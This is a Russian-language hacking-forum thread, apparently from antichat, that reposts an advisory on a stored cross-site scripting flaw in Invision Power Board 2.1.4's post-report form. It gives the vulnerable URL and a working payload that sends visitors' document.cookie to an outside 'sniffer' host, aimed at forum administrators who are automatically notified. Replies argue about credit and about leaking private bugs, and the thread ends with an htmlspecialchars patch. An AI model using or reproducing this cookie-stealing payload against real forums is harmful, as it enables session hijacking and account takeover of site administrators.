Команда Cyber Lords, нашла новую багу в IPB.
Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер.

Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0

Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script>

P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе.

Сам нашёл уязвимость?...

Команда Cyber Lords, нашла новую багу в IPB.
=))))

Первоначально багу нашел наш Морф, о чем ГМемберы могут видеть тут: http://forum.antichat.ru/thread11524.html

Морф красавец!...

Гы воть так нех приватные баги распространять вот блин тоже...................
Докатились............


ХРАНИТЬ ТАКОЕ НАДо!

:))

да зря выложили!

Команда Cyber Lords, нашла новую багу в IPB.
Тоесть можно код сниффера залить, и всё?

Защита.
Открыть sources/action_public/misc/contact_member.php
Найти:

$this->lib->msg_post = $this->email->message;
(431 строка по умолчанию)

Заменить на:

$this->lib->msg_post = htmlspecialchars($this->email->message);